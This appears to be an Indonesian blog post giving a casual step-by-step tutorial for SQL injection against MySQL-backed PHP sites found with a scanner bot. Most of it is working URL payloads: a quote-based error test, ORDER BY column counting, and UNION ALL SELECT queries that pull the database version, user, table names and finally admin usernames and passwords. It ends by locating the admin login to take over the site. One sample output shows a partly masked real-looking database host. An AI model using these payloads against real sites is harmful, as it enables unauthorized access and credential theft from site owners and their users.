semua orang ada kelemahan nya,begitu juga dengan web site yang mengguan kan dabase versi my SQL,mungkin security nya ato ntah apa lah yang kurang bagus..hehehe (kalo saya mah tau nya cuma gini ja,kalo mengaman kan jga bisa..wkwkwk :p)
;amjut ja gan,kelamaan celoteh ni saya,,, next ----=>
nah begini cara nya...cari target web nya.kalo gw pke BOT IRC SQL scanner..nah misal kan kita dapat http://www.target.com//newdetail.php?id nah,skrang tambah kan id nya angka 1 dan tanda petik ( ' ). http://www.target.com//newdetail.php?id=1' jika ada pesan error gini ->You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1.dari pesan tersebut,kemungkinan target bisa di hack.
lanjut deh langkah2 nya..
1.Periksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakukan penambahan/increment pada variabel num. Jika field masih tersedia maka halaman akan berjalan normal, tp jika field tidak tersedia maka halaman akan menampilkan pesan error.
http://www.target.com//newdetail.php?id=1+order+by+1-- <--masih normal/gag error.
http://www.target.com//newdetail.php?id=1+order+by+2-- <--masih normal juga.
http://www.target.com//newdetail.php?id=1+order+by+3-- <--masih sama
http://www.target.com//newdetail.php?id=1+order+by+4-- <--dst,sampe ke
http://www.target.com//newdetail.php?id=1+order+by+9-- <--terdapat pesan error lagi.(Unknown column '12' in 'order clause') yg berarti target hanya memiliki 8 field.
tanda (-) di akhir perintah adalah paramenter komentar pada syntax SQL.aaaaahhh,pusing kalo di jelas kan.hehe :D
lanjut ja coy...!!
2.Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang digunakan adalah UNION+ALL+SELECT+no_field+no_field+....
http://www.target.com//newsdetail.php?id=-+union+all+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8.9-- <--perhatikan di halaman target muncul angka exp:4,5,6,7 <--angka ini nanti kita pake buat ngeluarin beberapa informasi yang kita butuhkan, dari versi mysql, nama database, nama user, hingga password dan username.
lanjut...
3.selanjut nya kita lanjut dengan mencari infomasi tentang versi mysql,ama database, dan nama user. (mysql versi 5 konon katanya lebih mudah).
http://www.target.com//newsdetail.php?id=-1+union+all+select+1%2C2%2Cconcat_ws(0x2B,version(),database(),user()),4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--
exp: muncul 5.0.77+32908_leadac***atteryinfoorg+3**08_user116602@lnh-www1i.****halo.myregisteredsite.com 5.0.77 versi mysql 32908_leadac***atteryinfoorg database 3**08_user116602@lnh- www1i.****halo.myregisteredsite.com user.
4.Mengeluarkan informasi tentang nama2 tabel. perintah nya:
http://www.target.com//newsdetail.php?id=-1+union+all+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2Cgroup_concat%28table_name%29%2C9%2C10%2C11+from+information_schema.tables+where+table_schema%3Ddatabase%28%29--
keluar hasil pdigclicks,pdigengine,pdigexcludes,pdigincludes,pdigkeywords,pdiglogs,pdigsite_page,pdigsites,pdigspider,pdigtempspider,tbladmin,tblbanner,tblbanner_page,tblfaq,tblncategory,tblnews.
nama2 table telah kita dapat kan.sekatang kita lihat isi bladmin karna tujuan kita ini adalah mengetahui username dan password admin..hehe :D
5.sekarang saat nya kita tampil kan username dan password nya..perintah nya:
http://www.target.com//newsdetail.php?id=-1+union+all+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2Cconcat%28username%2C0x3a%2Cpassword%29%2C9%2C10%2C11+from+tbladmin--
jreeeeeeeeeeeeeeeng....muncul tu deh username dan password admin nya..hehe :D selanjut nya tinggal nyari url login admin nya deh.terserah deh mau cari nya pke tool apa.pke tool admin finder jga ada.. terkadang url lgoin admin kea gini http://www.target.com/admin.php<---ni.kalo dah dapat tinggal login deh sebagai admin ilegal..terserah tu target mau di apain,mau di patch jga bisa..xixixixi :D
ni hanya sekedar berbagi,jangan jadi kan kreminal.. :)



0 comments:
Post a Comment